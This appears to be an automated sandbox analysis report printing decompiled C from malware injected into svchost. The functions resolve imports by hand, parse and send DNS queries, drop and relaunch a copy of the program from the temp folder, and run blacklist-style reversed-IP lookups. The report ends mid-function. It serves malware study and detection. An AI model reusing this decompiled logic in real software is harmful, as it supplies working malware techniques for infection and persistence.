                                                                                • Instruction ID: 50407ec5d43a71cfa3bdab5fe8a2a24d9010e2b2c712535f1e2b8476df9b5b85
                                                                                • Opcode Fuzzy Hash: dba0b5043320315b9d059805a29d7b1a37645cc8b7a7487a6f265f1628e184d8
                                                                                • Instruction Fuzzy Hash: E1418AB1C00229BBDB10EBA1ED86FAFBBB8EF54324F104555F615A2191D7348A60DBA0
                                                                                Uniqueness
                                                                                • Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00126069(_Unknown_base(*)()* _a4) {
                                                                                				intOrPtr* _v8;
                                                                                				signed int _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				intOrPtr _t47;
                                                                                				_Unknown_base(*)()* _t48;
                                                                                				_Unknown_base(*)()* _t50;
                                                                                				struct HINSTANCE__* _t52;
                                                                                				_Unknown_base(*)()* _t53;
                                                                                				_Unknown_base(*)()* _t54;
                                                                                				_Unknown_base(*)()* _t55;
                                                                                				signed int _t56;
                                                                                				_Unknown_base(*)()* _t59;
                                                                                				_Unknown_base(*)()* _t62;
                                                                                				_Unknown_base(*)()* _t63;
                                                                                				intOrPtr _t69;
                                                                                				_Unknown_base(*)()* _t76;
                                                                                				_Unknown_base(*)()* _t77;
                                                                                				intOrPtr* _t82;
                                                                                				void* _t85;
                                                                                				intOrPtr* _t87;
                                                                                				_Unknown_base(*)()* _t89;
                                                                                
                                                                                				_t82 = _a4;
                                                                                				_t47 =  *_t82;
                                                                                				_t3 = _t82 + 4; // 0x65e85621
                                                                                				_t69 =  *_t3;
                                                                                				_v12 = 1;
                                                                                				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
                                                                                					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
                                                                                					_t48 = IsBadReadPtr(_t85, 0x14);
                                                                                					__eflags = _t48;
                                                                                					if(_t48 != 0) {
                                                                                						L29:
                                                                                						return _v12;
                                                                                					}
                                                                                					_t87 = _t85 + 0x10;
                                                                                					_v8 = _t87;
                                                                                					while(1) {
                                                                                						_t50 =  *(_t87 - 4);
                                                                                						__eflags = _t50;
                                                                                						if(_t50 == 0) {
                                                                                							goto L29;
                                                                                						}
                                                                                						_t52 = LoadLibraryA(_t50 + _t69);
                                                                                						_v16 = _t52;
                                                                                						__eflags = _t52 - 0xffffffff;
                                                                                						if(_t52 == 0xffffffff) {
                                                                                							L28:
                                                                                							_t44 =  &_v12;
                                                                                							 *_t44 = _v12 & 0x00000000;
                                                                                							__eflags =  *_t44;
                                                                                							goto L29;
                                                                                						}
                                                                                						_t10 = _t82 + 8; // 0x8bfffffa
                                                                                						_t53 =  *_t10;
                                                                                						__eflags = _t53;
                                                                                						if(_t53 != 0) {
                                                                                							_t14 = _t82 + 0xc; // 0x28408b06
                                                                                							_t54 = E0012EBED(_t53, 4 +  *_t14 * 4);
                                                                                						} else {
                                                                                							_t11 = _t82 + 0xc; // 0x28408b06
                                                                                							_t54 = E0012EBCC(4 +  *_t11 * 4);
                                                                                						}
                                                                                						 *(_t82 + 8) = _t54;
                                                                                						__eflags = _t54;
                                                                                						if(_t54 == 0) {
                                                                                							goto L28;
                                                                                						} else {
                                                                                							_t18 = _t82 + 0xc; // 0x28408b06
                                                                                							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
                                                                                							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
                                                                                							_t55 =  *(_t87 - 0x10);
                                                                                							__eflags = _t55;
                                                                                							if(_t55 == 0) {
                                                                                								_t89 =  *_t87 + _t69;
                                                                                								__eflags = _t89;
                                                                                								_t76 = _t89;
                                                                                							} else {
                                                                                								_t89 = _t55 + _t69;
                                                                                								_t76 =  *_v8 + _t69;
                                                                                							}
                                                                                							_t56 =  *_t89;
                                                                                							__eflags = _t56;
                                                                                							if(_t56 == 0) {
                                                                                								L25:
                                                                                								__eflags = _v12;
                                                                                								if(_v12 == 0) {
                                                                                									goto L29;
                                                                                								}
                                                                                								_v8 = _v8 + 0x14;
                                                                                								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
                                                                                								__eflags = _t59;
                                                                                								if(_t59 == 0) {
                                                                                									_t87 = _v8;
                                                                                									continue;
                                                                                								}
                                                                                								goto L29;
                                                                                							} else {
                                                                                								_a4 = _t76;
                                                                                								_a4 = _a4 - _t89;
                                                                                								__eflags = _t56;
                                                                                								do {
                                                                                									if(__eflags >= 0) {
                                                                                										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
                                                                                										__eflags = _t62;
                                                                                										if(_t62 == 0) {
                                                                                											L21:
                                                                                											_t63 = _a4;
                                                                                											__eflags =  *(_t63 + _t89);
                                                                                											if( *(_t63 + _t89) == 0) {
                                                                                												_t38 =  &_v12;
                                                                                												 *_t38 = _v12 & 0x00000000;
                                                                                												__eflags =  *_t38;
                                                                                												goto L25;
                                                                                											}
                                                                                											goto L22;
                                                                                										}
                                                                                										_t77 = _a4;
                                                                                										__eflags = _t62 -  *(_t77 + _t89);
                                                                                										if(_t62 ==  *(_t77 + _t89)) {
                                                                                											goto L21;
                                                                                										}
                                                                                										L20:
                                                                                										 *(_t77 + _t89) = _t62;
                                                                                										goto L21;
                                                                                									}
                                                                                									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
                                                                                									_t77 = _a4;
                                                                                									goto L20;
                                                                                									L22:
                                                                                									_t89 = _t89 + 4;
                                                                                									_t56 =  *_t89;
                                                                                									__eflags = _t56;
                                                                                								} while (__eflags != 0);
                                                                                								goto L25;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					goto L29;
                                                                                				}
                                                                                				return 1;
                                                                                			}
                                                                                0x00000000
                                                                                0x00126187
                                                                                0x00000000
                                                                                0x0012617a
                                                                                0x00126168
                                                                                0x0012616b
                                                                                0x0012616e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126170
                                                                                0x00126170
                                                                                0x00000000
                                                                                0x00126170
                                                                                0x0012614a
                                                                                0x00126150
                                                                                0x00000000
                                                                                0x0012617c
                                                                                0x0012617c
                                                                                0x0012617f
                                                                                0x00126181
                                                                                0x00126181
                                                                                0x00000000
                                                                                0x00126185
                                                                                0x00126135
                                                                                0x00126106
                                                                                0x00000000
                                                                                0x001260b5
                                                                                0x00000000

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,001264CF,00000000), ref: 0012609C
• LoadLibraryA.KERNEL32(?,?,001264CF,00000000), ref: 001260C3
• GetProcAddress.KERNEL32(?,00000014), ref: 0012614A
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0012619E
Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID: Read$AddressLibraryLoadProc
• String ID:
• API String ID: 2438460464-0
• Opcode ID: 9ff05ae0f9fb27a39af85f672fe8e81d3e0c84ab8d5758ca47a106cbfc562476
• Instruction ID: 73c3eb80c470b7979b89b1f26fb1009ad13aa6ea332e756ea124b74817fb7fca
• Opcode Fuzzy Hash: 9ff05ae0f9fb27a39af85f672fe8e81d3e0c84ab8d5758ca47a106cbfc562476
• Instruction Fuzzy Hash: F9418C71A00225AFDB18CF58E884BA9B7F9EF54354F248068E815D7291E730FD60DB80
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
E00122923(void* __ecx, void* __esi, intOrPtr _a4) {
	/* Decompiler output. The function walks the resource records of a DNS
	   reply held at __esi (_a4 bytes long) and links a heap node (0x124 bytes)
	   per record into a singly linked list. The DNS-specific comments below
	   follow from the fixed field offsets used in the code. */
	signed int* _v8;        // last node appended (list tail)
	signed int* _v12;       // records appended so far (used as a counter)
	signed int* _v16;       // first node (return value)
	intOrPtr _v20;          // total number of records to parse
	intOrPtr _v24;          // offset of the record's RDATA
	signed short _v28;      // RDLENGTH
	short _v30;             // CLASS
	short _v32;             // TYPE
	char _v292;             // decoded owner name of the current record
	char _v296;
	void* __ebx;
	void* __edi;
	void* _t37;
	intOrPtr _t41;
	signed int* _t42;
	signed short _t53;
	signed int** _t62;
	void* _t67;
	void* _t70;
	intOrPtr _t71;
	intOrPtr* _t79;
	signed int* _t80;
	void* _t81;
	void* _t82;
	void* _t83;
	intOrPtr _t15;          // used below but left undeclared by the decompiler
	signed int _t76;        // used below but left undeclared by the decompiler

	_t81 = __esi;
	_t37 = 0xc;
	_v8 = 0;
	_v16 = 0;
	if(_a4 >= _t37) {                       // need at least the 12-byte DNS header
		_t67 = E00122816(_t37, __esi, __ecx, __esi, _a4);   // offset of the first record
		if(_t67 < _a4) {
			_t76 =  *(__esi + 6) & 0x0000ffff;
			// header words at 6, 8 and 0xa: ANCOUNT + NSCOUNT + ARCOUNT
			_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
			_v20 = _t41;
			_v12 = 0;
			if(_t41 <= 0) {
				L13:
				_t42 = _v16;
				L14:
				return _t42;
			}
			while(_t67 < _a4) {
				E0012EE2A(_t76,  &_v296, 0, 0x114);      // zero the name buffer
				_t70 = E00122871(_t67, _t81, _t76,  &_v292, _a4);   // decode owner name, returns end offset
				_t15 = _t70 + 0xa; // 0xa
				_t83 = _t82 + 0x10;
				if(_t15 >= _a4) {                       // 10-byte fixed RR header must fit
					goto L13;
				}
				_t79 = __imp__#15;                      // ws2_32 ordinal #15 = ntohs
				_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);         // TYPE
				_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);     // CLASS
				_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);     // RDLENGTH (after 4-byte TTL)
				_v28 = _t53;
				_t71 = _t70 + 0xa;
				_v24 = _t71;
				if((_t53 & 0x0000ffff) + _t71 > _a4) {  // RDATA must fit in the packet
					goto L13;
				}
				_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
				if(_t80 == 0) {
					goto L13;
				}
				E0012EE2A(_t76, _t80, 0, 0x124);        // zero the new node
				E0012EE08(_t80,  &_v296, 0x114);        // copy the decoded name into it
				 *_t80 =  *_t80 & 0x00000000;           // next pointer = NULL
				_t67 = _t71 + (_v28 & 0x0000ffff);      // advance past RDATA
				_t62 = _v8;
				_t82 = _t83 + 0x18;
				_v8 = _t80;
				if(_t62 != 0) {
					 *_t62 = _t80;                      // append to tail
				} else {
					_v16 = _t80;                        // first node becomes head
				}
				_v12 = _v12 + 1;
				if(_v12 < _v20) {
					continue;
				} else {
					goto L13;
				}
			}
			goto L13;
		}
		_t42 = 0;
		goto L14;
	}
	return 0;
}

Instruction offsets, one per decompiled line (0x00000000 marks lines with no mapped instruction):
0x00122923 0x00122931 0x00122932 0x00122935 0x0012293b 0x00122950 0x00122957 0x0012296a
0x0012296e 0x00122970 0x00122973 0x00122978 0x00122a5b 0x00122a5b 0x00122a5e 0x00000000
0x00122a5e 0x0012297e 0x00122995 0x001229ac 0x001229ae 0x001229b1 0x001229b7 0x00000000
0x00000000 0x001229c1 0x001229ca 0x001229d6 0x001229e0 0x001229e2 0x001229e6 0x001229ee
0x001229f4 0x00000000 0x00000000 0x00122a0a 0x00122a0e 0x00000000 0x00000000 0x00122a18
0x00122a2a 0x00122a33 0x00122a36 0x00122a38 0x00122a3b 0x00122a3e 0x00122a43 0x00122a4a
0x00122a45 0x00122a45 0x00122a45 0x00122a4c 0x00122a55 0x00000000 0x00000000 0x00000000
0x00000000 0x00122a55 0x00000000 0x0012297e 0x00122959 0x00000000 0x00122959 0x00000000

Memory Dump Source
• Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_120000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40be8cc45219dbf142d542c702ad92317575d8bf2040ff4f17fa68d25ad2a69d
• Instruction ID: 57e6b82f50129eda3b177462374856f28c2c0977863fed85fdf3b859298ae44b
• Opcode Fuzzy Hash: 40be8cc45219dbf142d542c702ad92317575d8bf2040ff4f17fa68d25ad2a69d
• Instruction Fuzzy Hash: B031A071A00228BBDB219FA5EC81ABEB7F4FF58701F104456E505EB641E374DAA1CB60
Uniqueness

Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E001226FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
                                                                                				long* _t33;
                                                                                				long _t35;
                                                                                				long* _t36;
                                                                                				long _t37;
                                                                                				long _t38;
                                                                                				short _t39;
                                                                                				short _t40;
                                                                                				char _t42;
                                                                                				intOrPtr _t43;
                                                                                				void* _t48;
                                                                                				long* _t49;
                                                                                				long* _t51;
                                                                                				long* _t52;
                                                                                				long* _t53;
                                                                                				long* _t54;
                                                                                				void* _t55;
                                                                                				long* _t56;
                                                                                				long* _t57;
                                                                                				long* _t60;
                                                                                				intOrPtr* _t63;
                                                                                				intOrPtr* _t65;
                                                                                				void* _t66;
                                                                                
                                                                                				_t65 = __eax;
                                                                                				_t33 =  *0x132bf8; // 0x0
                                                                                				_t42 = 0;
                                                                                				if(_t33 == 0) {
                                                                                					_t33 = E0012EBCC(0x400);
                                                                                					_pop(_t48);
                                                                                					 *0x132bf8 = _t33;
                                                                                				}
                                                                                				E0012EE2A(_t48, _t33, _t42, 0x400);
                                                                                				_t35 = GetTickCount();
                                                                                				_t49 =  *0x132bf8; // 0x0
                                                                                				_t63 = __imp__#9;
                                                                                				 *_t49 = _t35;
                                                                                				_t36 =  *0x132bf8; // 0x0
                                                                                				_t36[0] = _a12;
                                                                                				_t37 =  *_t63(1);
                                                                                				_t51 =  *0x132bf8; // 0x0
                                                                                				_t51[1] = _t37;
                                                                                				_t52 =  *0x132bf8; // 0x0
                                                                                				_t38 = 0;
                                                                                				_t52[1] = 0;
                                                                                				_t53 =  *0x132bf8; // 0x0
                                                                                				_t53[2] = 0;
                                                                                				_t54 =  *0x132bf8; // 0x0
                                                                                				_t54[2] = 0;
                                                                                				_t60 =  *0x132bf8; // 0x0
                                                                                				_t55 = 0;
                                                                                				if( *_t65 != _t42) {
                                                                                					do {
                                                                                						_t43 =  *((intOrPtr*)(_t38 + _t65));
                                                                                						_a12 = _t38;
                                                                                						while(_t43 != 0) {
                                                                                							if(_t43 != 0x2e) {
                                                                                								_a12 = _a12 + 1;
                                                                                								_t43 =  *((intOrPtr*)(_a12 + _t65));
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
                                                                                						_t55 = _t55 + 1;
                                                                                						while(_t38 < _a12) {
                                                                                							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
                                                                                							_t55 = _t55 + 1;
                                                                                							_t38 = _t38 + 1;
                                                                                						}
                                                                                						if( *((char*)(_t38 + _t65)) == 0x2e) {
                                                                                							_t38 = _t38 + 1;
                                                                                						}
                                                                                						_t42 = 0;
                                                                                					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
                                                                                				}
                                                                                				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
                                                                                				_t24 = _t55 + 0xd; // 0xf
                                                                                				_t66 = _t24;
                                                                                				_t39 =  *_t63(0xf);
                                                                                				_t56 =  *0x132bf8; // 0x0
                                                                                				 *((short*)(_t56 + _t66)) = _t39;
                                                                                				_t40 =  *_t63(1);
                                                                                				_t57 =  *0x132bf8; // 0x0
                                                                                				 *((short*)(_t57 + _t66 + 2)) = _t40;
                                                                                				__imp__#20(_a4, 0x132bf8, _t66 + 4, _t42, _a8, 0x10);
                                                                                				return 0 | _t40 <= 0x00000000;
                                                                                			}
                                                                                Instruction addresses (report address column for this function): 0x00122704 to 0x00122815

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0012272E
                                                                                • htons.WS2_32(00000001), ref: 00122752
                                                                                • htons.WS2_32(0000000F), ref: 001227D5
                                                                                • htons.WS2_32(00000001), ref: 001227E3
                                                                                • sendto.WS2_32(?,00132BF8,00000009,00000000,00000010,00000010), ref: 00122802
                                                                                  • Part of subcall function 0012EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0012EBFE,7FFF0001,?,0012DB55,7FFF0001), ref: 0012EBD3
                                                                                  • Part of subcall function 0012EBCC: RtlAllocateHeap.NTDLL(00000000,?,0012DB55,7FFF0001), ref: 0012EBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                • String ID:
                                                                                • API String ID: 1128258776-0
                                                                                • Opcode ID: 7627b38f58929985be96ac8e6049f7f0ad334ef06a7738a2f0fd93ca8a33e068
                                                                                • Instruction ID: bf74d693e8014422cead0a7a259a828a1614b7da96e491995da9cd0bd0eb69ec
                                                                                • Opcode Fuzzy Hash: 7627b38f58929985be96ac8e6049f7f0ad334ef06a7738a2f0fd93ca8a33e068
                                                                                • Instruction Fuzzy Hash: 4D312634244392BFD7109F74FC90E65B760EF29314B1A406DE8558B722D73398A6D710
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00129145(void* __eflags) {
                                                                                				char _v264;
                                                                                				char _v1288;
                                                                                				char* _t13;
                                                                                				void* _t20;
                                                                                				void* _t23;
                                                                                				void* _t29;
                                                                                
                                                                                				_t29 = __eflags;
                                                                                				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
                                                                                				CharToOemA( &_v264,  &_v264);
                                                                                				_t13 =  &_v264;
                                                                                				_push(_t13);
                                                                                				_push(_t13);
                                                                                				wsprintfA( &_v1288, E00122544(0x1322f8,  &E001307A8, 0x66, 0xe4, 0xc8));
                                                                                				E0012EE2A(_t23, 0x1322f8, 0, 0x100);
                                                                                				_t20 = E00129064(_t29,  &_v1288,  &_v264);
                                                                                				if(_t20 != 0) {
                                                                                					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
                                                                                				}
                                                                                				return _t20;
                                                                                			}
                                                                                Instruction addresses (report address column for this function): 0x00129145 to 0x001291ea

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,001322F8), ref: 0012915F
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00129166
                                                                                • CharToOemA.USER32 ref: 00129174
                                                                                • wsprintfA.USER32 ref: 001291A9
                                                                                  • Part of subcall function 00129064: GetTempPathA.KERNEL32(00000400,?,00000000,001322F8), ref: 0012907B
                                                                                  • Part of subcall function 00129064: wsprintfA.USER32 ref: 001290E9
                                                                                  • Part of subcall function 00129064: CreateFileA.KERNEL32(001322F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012910E
                                                                                  • Part of subcall function 00129064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00129122
                                                                                  • Part of subcall function 00129064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0012912D
                                                                                  • Part of subcall function 00129064: CloseHandle.KERNEL32(00000000), ref: 00129134
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 001291E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 3857584221-0
                                                                                • Opcode ID: 5319953dee484c496063d841a7c49ec8e046ac815c098fb275e65f1af9080c30
                                                                                • Instruction ID: 1dc375ffc274aaa3c382f337e57d8990ac1c4fe44849c605f7afc313438c7926
                                                                                • Opcode Fuzzy Hash: 5319953dee484c496063d841a7c49ec8e046ac815c098fb275e65f1af9080c30
                                                                                • Instruction Fuzzy Hash: 750152F69001187BDB21A7619D89EDF77BCDB99701F000091B749E2050D7B09AD5CF70
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00122419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				int _v8;
                                                                                				int _t18;
                                                                                				intOrPtr _t20;
                                                                                				CHAR* _t21;
                                                                                				int _t30;
                                                                                				CHAR* _t36;
                                                                                
                                                                                				_t18 = lstrlenA(_a12);
                                                                                				_t36 = _a4;
                                                                                				_v8 = _t18;
                                                                                				_t20 = _a8 + _t36;
                                                                                				_a8 = _t20;
                                                                                				if(_t36 >= _t20) {
                                                                                					L5:
                                                                                					_t21 = 0;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t30 = lstrlenA(_t36);
                                                                                						_t7 =  &(_t36[1]); // 0x1
                                                                                						_a4 = _t30 + _t7;
                                                                                						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
                                                                                							break;
                                                                                						}
                                                                                						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
                                                                                						if(_t36 < _a8) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                					_t21 = _a4;
                                                                                				}
                                                                                				L6:
                                                                                				return _t21;
                                                                                			}
                                                                                Instruction addresses (report address column for this function): 0x00122429 to 0x0012247b

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001), ref: 00122429
                                                                                • lstrlenA.KERNEL32(?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001,00121E3D,00000001,localcfg,lid_file_upd), ref: 0012243E
                                                                                • lstrcmpiA.KERNEL32(?,?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001,00121E3D,00000001,localcfg), ref: 00122452
                                                                                • lstrlenA.KERNEL32(?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001,00121E3D,00000001,localcfg,lid_file_upd), ref: 00122467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcmpi
                                                                                • String ID: localcfg
                                                                                • API String ID: 1808961391-1857712256
                                                                                • Opcode ID: 9458cf7a3a9e2c6ccdb99c689ed3bbcb8ba7ff363582eebd3f6de517420d27a0
                                                                                • Instruction ID: 4f4befc00c53ecca67b6fd0483166249137a1dedde3f6e3a74ed41e80a92afb4
                                                                                • Opcode Fuzzy Hash: 9458cf7a3a9e2c6ccdb99c689ed3bbcb8ba7ff363582eebd3f6de517420d27a0
                                                                                • Instruction Fuzzy Hash: DE01DA31600268FFCF15EF69DC849DE7BA9EF44394B51C525F95997211E330EA508A90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00121C5F(void* __eflags) {
                                                                                				signed int _t49;
                                                                                				signed int _t51;
                                                                                				void* _t80;
                                                                                				char _t91;
                                                                                				void* _t92;
                                                                                				signed int _t98;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t103;
                                                                                				void* _t105;
                                                                                				void* _t107;
                                                                                				void* _t108;
                                                                                
                                                                                				_t105 = _t107 - 0x70;
                                                                                				_t108 = _t107 - 0x114;
                                                                                				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
                                                                                				_t98 =  *(_t105 + 0x7c);
                                                                                				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
                                                                                				_t101 = E0012ED03(_t98, 0x2c);
                                                                                				if(_t101 == 0) {
                                                                                					L6:
                                                                                					_t49 = _t98;
                                                                                					_t32 = _t49 + 1; // 0x2
                                                                                					_t102 = _t32;
                                                                                					do {
                                                                                						_t91 =  *_t49;
                                                                                						_t49 = _t49 + 1;
                                                                                					} while (_t91 != 0);
                                                                                					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
                                                                                					_t51 = _t98;
                                                                                					_t35 = _t51 + 1; // 0x2
                                                                                					_t103 = _t35;
                                                                                					do {
                                                                                						_t92 =  *_t51;
                                                                                						_t51 = _t51 + 1;
                                                                                					} while (_t92 != 0);
                                                                                					E0012EE5C(_t105 - 0x24, _t98, _t51 - _t103);
                                                                                					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
                                                                                					if(E00122684(_t105 - 0xa4) != 0) {
                                                                                						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
                                                                                					}
                                                                                					L12:
                                                                                					return  *(_t105 + 0x6c);
                                                                                				}
                                                                                				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
                                                                                				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
                                                                                				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
                                                                                				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
                                                                                				while(1) {
                                                                                					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
                                                                                					E0012EE5C(_t105 - 0x24, _t98, _t101 - _t98);
                                                                                					_t22 = _t101 + 1; // 0x1
                                                                                					_t98 = _t22;
                                                                                					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
                                                                                					_t80 = E00122684(_t105 - 0xa4);
                                                                                					_t108 = _t108 + 0x2c;
                                                                                					if(_t80 != 0) {
                                                                                						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
                                                                                					}
                                                                                					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
                                                                                					if( *(_t105 + 0x7c) > 0x1e) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t101 = E0012ED03(_t98, 0x2c);
                                                                                					if(_t101 != 0) {
                                                                                						continue;
                                                                                					}
                                                                                					goto L6;
                                                                                				}
                                                                                				goto L12;
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                • API String ID: 2111968516-120809033
                                                                                • Opcode ID: 327553396a0d29ceee4e0d22a72e92fb71db9a7f5109abdcb64baacae33f16e3
                                                                                • Instruction ID: dc3b21c720520e395ef3b9fd9679d1e314ba975e4d23364b6833a8d8de5d1bf6
                                                                                • Opcode Fuzzy Hash: 327553396a0d29ceee4e0d22a72e92fb71db9a7f5109abdcb64baacae33f16e3
                                                                                • Instruction Fuzzy Hash: 9A417C729042ACAFDB21DFB8AD54AEE3BE89F59310F240056FDA4D3152D735DA05CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				intOrPtr _t30;
                                                                                				CHAR* _t31;
                                                                                				int _t34;
                                                                                				intOrPtr* _t41;
                                                                                				intOrPtr* _t42;
                                                                                				void* _t47;
                                                                                				intOrPtr _t51;
                                                                                				int _t52;
                                                                                				void* _t53;
                                                                                				intOrPtr _t54;
                                                                                				void* _t55;
                                                                                				char _t59;
                                                                                
                                                                                				E0012DD05();
                                                                                				_t41 = 0x1320e8;
                                                                                				_t55 =  *0x1320e8 - 0x1320e8; // 0x61f0a8
                                                                                				if(_t55 == 0) {
                                                                                					L9:
                                                                                					_t53 = E0012EBCC(0x1c);
                                                                                					if(_t53 != 0) {
                                                                                						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
                                                                                						 *((intOrPtr*)(_t53 + 4)) = _a8;
                                                                                						E00123E8F(0x1320e8, _t53);
                                                                                						__eflags = _a12;
                                                                                						if(_a12 == 0) {
                                                                                							 *(_t53 + 8) = 0;
                                                                                						} else {
                                                                                							_t15 = _t53 + 8; // 0x8
                                                                                							lstrcpynA(_t15, _a12, 0xf);
                                                                                							 *((char*)(_t53 + 0x17)) = 0;
                                                                                						}
                                                                                						L15:
                                                                                						_t42 = 0x1320e4;
                                                                                						__eflags =  *0x1320e4 - _t42; // 0x610f68
                                                                                						if(__eflags == 0) {
                                                                                							L22:
                                                                                							_t47 = 1;
                                                                                							L11:
                                                                                							E0012DD69();
                                                                                							return _t47;
                                                                                						} else {
